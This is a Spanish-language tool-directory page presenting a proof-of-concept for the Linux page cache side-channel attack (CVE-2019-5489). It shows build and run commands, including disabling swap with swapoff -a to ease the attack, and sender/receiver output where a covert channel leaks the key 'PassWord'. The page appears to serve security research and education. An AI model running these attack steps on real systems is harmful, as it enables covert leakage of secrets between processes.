Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-5489 — Prueba de concepto de ataques de canal lateral de Page Cache (CVE-2019-5489) para Linux | Kitploit
Herramientas/GitHubGitHub/mmxsrup/cve-2019-5489
Análisis de VulnerabilidadesExplotaciónRecopilación de InformaciónPapers e InvestigaciónAprendizaje y EducaciónExplotación de Binarios
GitHubmmxsrup/cve-2019-5489

CVE-2019-5489

Prueba de concepto de ataques de canal lateral de Page Cache (CVE-2019-5489) para Linux

Ver Repositorio
1032hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE 2019-5489

Este repositorio contiene una prueba de concepto de los Ataques de Canal Lateral de Page Cache (CVE-2019-5489) para Linux.

Para evaluar el canal lateral de page cache, he implementado un canal encubierto entre dos procesos. El proceso emisor envía datos confidenciales a un proceso receptor a través del canal lateral de page cache. Los ataques de page cache han sido mitigados en Linux Kernel 5.0 y posteriores, por lo que esta PoC solo funcionará antes de Linux Kernel 5.0.

NOTA: He probado su funcionamiento en Ubuntu 18.04, Linux 4.15.0-70.

Compilación

Ejecute el siguiente comando.

root@kitploit:~
git clone https://github.com/mmxsrup/CVE-2019-5489
cd CVE-2019-5489
make

Ejecución

Desactive el espacio de intercambio (swap) para facilitar el ataque.

root@kitploit:~
swapoff -a

Terminal 1

Primero, ejecute el siguiente comando en la terminal 1.

root@kitploit:~
make run-sender

Terminal 2

Después de que se muestre sending 1th character ... en la terminal 1, ejecute el siguiente comando.

root@kitploit:~
make run-receiver

Salida

Si la ejecución es exitosa, se mostrará lo siguiente.
Esto muestra que la clave fue enviada del proceso Sender al proceso Receiver a través del canal lateral de page cache.

Terminal 1

root@kitploit:~
LD_LIBRARY_PATH=. ./sender
Sender process
ecicting page cache ...
sending 1th character ...
ecicting page cache ...
sending 2th character ...
ecicting page cache ...
sending 3th character ...
ecicting page cache ...
sending 4th character ...
ecicting page cache ...
sending 5th character ...
ecicting page cache ...
sending 6th character ...
ecicting page cache ...
sending 7th character ...
ecicting page cache ...
sending 8th character ...
ecicting page cache ...
sending 9th character ...

Terminal 2

root@kitploit:~
LD_LIBRARY_PATH=. ./receiver
Sender process
waiting ...
recved caracter(P)
waiting ...
recved caracter(a)
waiting ...
recved caracter(s)
waiting ...
recved caracter(s)
waiting ...
recved caracter(W)
waiting ...
recved caracter(o)
waiting ...
recved caracter(r)
waiting ...
recved caracter(d)
waiting ...
recved caracter()
Received key: PassWord

Referencias

  • Daniel Gruss et al. Page cache attacks [CCS 19]
Descargar herramienta